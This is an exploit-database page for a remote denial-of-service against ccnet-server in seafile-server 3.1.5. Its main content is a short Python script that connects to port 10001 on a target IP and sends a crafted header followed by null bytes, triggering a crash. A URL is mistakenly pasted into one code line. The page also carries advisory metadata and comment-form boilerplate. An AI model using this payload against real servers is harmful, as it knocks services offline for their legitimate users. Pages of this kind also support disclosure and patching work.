seafile-server 3.1.5 Denial Of Service

2014.09.18
Credit: retset
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: ccnet-server remote DoS (assert) in seafile-server 3.1.5 # Date: Sep 4, 2014 # Exploit Author: retset # Vendor Homepage: seafile.com # Software Link: https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz # Version: seafile-server 3.1.4 # Tested on: Windows 7/seafile-server 3.1.5 import socket import sys ip = sys.argv[1] addr = (ip, 10001)https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz s = socket.create_connection(addr) dos = '\x00\x04\x00\x00\x00\x00\x03\xe8' dos += '\x00' * 1001 s.send(dos) print repr(s.recv(1024)) s.close() #@retset

References:

https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top